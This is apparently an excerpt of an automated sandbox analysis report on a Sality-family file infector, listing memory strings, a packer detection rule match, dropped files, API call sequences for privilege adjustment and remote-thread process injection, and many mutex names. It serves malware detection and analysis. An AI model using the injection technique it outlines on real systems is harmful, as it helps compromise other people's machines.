        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsD
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2059510664.000001D61A642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 18_2_00409018 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,GetDC,GetDC,CreateCompatibleBitmap,SelectObject,GetDC,BitBlt,DeleteObject,GdiplusShutdown

        System Summary

        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1430cc4.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: section name:
        Source: jvauyc32.exe.1.dr | Static PE information: section name:
        Source: jvauyc32.exe.1.dr | Static PE information: section name:
        Source: jvauyc32.exe.1.dr | Static PE information: section name:
        Source: jvauyc32.exe.1.dr | Static PE information: section name:
        Source: winfpnht.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winmxfy.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: voiv.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rckc.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winkvnav.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Process Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | File created: C:\Windows\66b8c0
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | File created: C:\Windows\726f78
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | File deleted: C:\Windows\66b8c0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_00AB6111
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_0143E329
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_0143B614
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_01446CD0
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 10_2_00976111
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 10_2_00A00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 10_2_00A20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 10_2_00A40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 10_2_00BA0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Code function: 18_2_00403BFD
        Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
        Source: msedge.exe.10.dr | Static PE information: Number of sections : 14 > 10
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1430cc4.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: winfpnht.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winmxfy.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: voiv.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rckc.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winkvnav.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rckc.exe.10.dr | Static PE information: Section .text
        Source: winfpnht.exe.1.dr | Static PE information: Section .text
        Source: winkvnav.exe.10.dr | Static PE information: Section .text
        Source: voiv.exe.1.dr | Static PE information: Section .text
        Source: winmxfy.exe.1.dr | Static PE information: Section .text
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: Section: ZLIB complexity 1.0010673394139336
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: Section: ZLIB complexity 1.0381944444444444
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: Section: ZLIB complexity 0.9934809602649006
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Static PE information: Section: ZLIB complexity 1.0497737556561086
        Source: jvauyc32.exe.1.dr | Static PE information: Section: ZLIB complexity 1.0010673394139336
        Source: jvauyc32.exe.1.dr | Static PE information: Section: ZLIB complexity 1.0381944444444444
        Source: jvauyc32.exe.1.dr | Static PE information: Section: ZLIB complexity 0.9934809602649006
        Source: jvauyc32.exe.1.dr | Static PE information: Section: ZLIB complexity 1.0497737556561086
        Source: classification engine | Classification label: mal100.spre.phis.troj.evad.winEXE@17/49@220/100
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Code function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004074BF LookupPrivilegeValueW,AdjustTokenPrivileges,18_2_004074BF
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB58EB CreateToolhelp32Snapshot,Module32FirstW,1_2_00AB58EB
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00407B22 wcscpy,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,SysFreeString,wcscpy,VariantClear,wcscpy,wcscpy,CoUninitialize,18_2_00407B22
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Roaming\Z0BAZwxxJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_3504_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3964_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2584_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5904_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6876_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5040_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3836_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4060_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1916_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5408_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1928_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3512_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2424_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3904_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_6940_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1836_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2256_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1800_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3932_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2680_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_732_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1156_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7148_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1972_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5884_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1692_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7164_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3340_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7140_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5860_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1160_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5084_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_6720_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_1852_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6620_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1348_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_660_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1336_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6248_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2024_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6088_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6660_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2052_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_792_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_2200_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1036_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_6380_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5796_
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Mutant created: \Sessions\1\BaseNamedObjects\Z0BAZwxx
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3440_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2056_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4912_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_6160_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2884_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4812_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2860_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2168_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_4696_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3768_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6676_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_968_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3400_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1392_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_436_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2736_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5688_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_5016_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6136_
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2708_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1504_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1936_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_6352_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2104_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6844_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2500_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1616_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1148_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3916_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5808_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3596_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3520_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7000_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3200_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1640_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1220_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1680_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_7020_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1792_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1408_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_2780_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_4068_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4336_
